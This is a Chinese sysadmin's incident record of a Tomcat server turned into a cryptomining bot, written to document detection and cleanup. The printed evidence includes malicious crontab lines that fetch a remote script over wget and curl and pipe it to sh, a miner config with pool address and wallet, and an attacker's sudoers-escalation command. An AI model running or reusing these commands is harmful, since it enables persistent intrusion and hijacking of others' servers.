Tomcat应用服务器被黑客肉鸡攻击记录

线上一台应用服务器报警，负载过高，这个就诡异了，因为只是一个普通的服务器，应用使用人员不到10个人，咋会负载高，肯定有问题哪，登陆上去查看，
top查看哪个占据的cpu资源比较多

[root@aew01~]# top
top - 14:27:49 up 423 days, 22:48,  3 users,  load average: 2.10, 1.85, 1.66
Tasks: 166 total,   1 running, 164 sleeping,   0 stopped,   1 zombie
Cpu0  : 45.4%us,  0.8%sy,  0.0%ni, 53.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  : 38.2%us,  0.8%sy,  0.0%ni, 59.8%id,  0.0%wa,  0.0%hi,  1.2%si,  0.0%st
Mem:  14389372k total, 14233284k used,   156088k free,    12388k buffers
Swap: 33554428k total,  1511980k used, 32042448k free,    40140k cachedPID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
39674 tomcat    20   0  223m 2808  412 S 75.0  0.0   4031:53 atd
54892 tomcat    20   0 10.1g 3.6g 4816 S  4.6 26.4 969:07.52 java  [tomcat@aew01~]$ crontab -l*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh
[tomcat@aew01~]$

看到有一个atd进程，这是什么鬼？查看atd进程

[root@aew01~]# ps -eaf|grep 39674
root     39023 37026  0 14:28 pts/0    00:00:00 grep 39674
tomcat   39674     1 85 Jul15 ?        2-19:12:05 ./atd -c bmsnxvpggm.conf -t 1
[root@aew01~]#

再查看atd执行脚本组件，看到是一个编译之后的可执行组件

[root@aew01~]# find / -name atd
/usr/sbin/atd
/etc/sysconfig/atd
/etc/pam.d/atd
/etc/rc.d/init.d/atd
/var/tmp/atd
[root@aew01~]# more /usr/sbin/atd******** /usr/sbin/atd: Not a text file ********[root@aew01~]#

查看配置文件bmsnxvpggm.conf

[root@aew01~]# more /var/tmp/bmsnxvpggm.conf
{"url" : "stratum+tcp://94.23.41.130:80","user" : "49mQCzecsC6TS1sNBj5XQX4dNG8MESvLGLPHYJLKohVCQivAB5jJw2xHokTpjtSfE3D8m2U3JjDGEWJMYLrN216CM3dRpBt","pass" : "x","algo" : "cryptonight","quiet" : true
}
[root@aew01~]#

看来是被盯上了，攻击了。kill掉进程

[root@aew01~]# kill -9 39979
[root@aew01~]# ps -eaf|grep atd
root     40917 37026  0 14:48 pts/0    00:00:00 grep atd
[root@aew01~]#

然后负载降下来了，但是可恶的是，不到5分钟，负载又上来了，一看又是atd这个进程在运行，进去查看tomcat的crontab任务，发现已经被写进crontab任务了，于是注释掉crontab任务。

 [tomcat@aew01~]$ crontab -l*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh[tomcat@aew01~]$

然后又查看历史操作，有这样一个命令echo "tomcat ALL=(ALL) ALL" >> /etc/sudoers曾经被执行过 >echo "tomcat ALL=(ALL) ALL" >> /etc/sudoers >，于是，为了安全起见，进配置/etc/sudoers文件里面，注释掉 #tomcat ALL=(ALL) ALL这一行，然后重启tomcat应用程序。

彻底检查了下应用服务器所对于的db服务器，发现db没有被攻击，各种数据账号安全，又迅速修改了数据库账号密码等等。

BTY：最终的彻底的解解决方案还是需要应用开发人员，堵住tomcat的漏洞，避免黑客使用tomcat漏洞获得应用服务器的tomcat账号权限，进而登陆应用服务器，将应用服务器做成肉鸡，不停的往外发包。

Tomcat应用服务器被黑客肉鸡攻击记录相关推荐

Nginx一次肉鸡攻击记录
记录 Nginx log日志 access log中存在大量404访问,疑似存在肉鸡遍历目录攻击 Nginx format 格式由于上线的产品经理没有深入了解Nginx配置,导致nginx配置log ...
为什么黑客无法攻击公开的区块链？
作者 | Tanveer Ahmad 译者 | 弯月,责编 | 郭芮头图 | CSDN 下载自东方 IC 出品 | CSDN(ID:CSDNnews) 以下为译文: 人们对区块链这个词总是充满了迷之 ...
服务器遭到newinit.sh木马挖矿攻击记录
服务器遭到newinit.sh木马攻击记录一.中毒现象(Redis后门漏洞导致服务器被注入挖矿脚本解决) 服务器负载异常,具体表现load值冲高服务器部分命令不可用,如top.ps.pstree. ...
Apache Tomcat 缓慢的HTTP拒绝服务攻击
Apache Tomcat 缓慢的HTTP拒绝服务攻击漏洞详情缓慢的HTTP拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量HTTP请求攻 ...
人人都能成为安全防范的高手 ——《黑客新型攻击防范：深入剖析犯罪软件》
人人都能成为安全防范的高手 --<黑客新型攻击防范:深入剖析犯罪软件> 过去,人们认为恶意软件是一种纯粹的技术威胁,它主要依靠技术漏洞实现感染.创作者开发它们往往是出于好奇心理,有时则是为 ...
本人服务器遭受黑客长期攻击，特把这几天做的一些有用的安全方面总结出来，以方便以后查阅
消息队列 iis 360 north rar sql2000 netscren 本人服务器遭受黑客长期攻击,特把这几天做的一些有用的安全方面总结出来,以方便以后查阅,希望这次彻底解觉黑客的攻击,特次谢 ...
研究员详述巴基斯坦黑客如何攻击印度和阿富汗政府
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士巴基斯坦威胁组织成功地社工了多个阿富汗国家机构以及印度的一台共享政府计算机,窃取敏感的谷歌.推特和Facebook 凭据并静默访问政府门户. M ...
请君入瓮：火眼自称遭某 APT 国家黑客组织攻击
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队火眼公司自称被黑,表示 "高度复杂的威胁行动者"访问了其内网且用于测试客户网络的红队工具被盗. 政府客户信息和红队 ...
pache tomcat慢速HTTP拒绝服务攻击安全问题解决办法
pache tomcat慢速HTTP拒绝服务攻击安全问题解决办法参考文章: (1)pache tomcat慢速HTTP拒绝服务攻击安全问题解决办法 (2)https://www.cnblogs.co ...

Tomcat应用服务器被黑客肉鸡攻击记录

Tomcat应用服务器被黑客肉鸡攻击记录相关推荐

最新文章

热门文章

Tomcat应用服务器被黑客 肉鸡攻击 记录

Tomcat应用服务器被黑客 肉鸡攻击 记录相关推荐

最新文章

热门文章

Tomcat应用服务器被黑客肉鸡攻击记录

Tomcat应用服务器被黑客肉鸡攻击记录相关推荐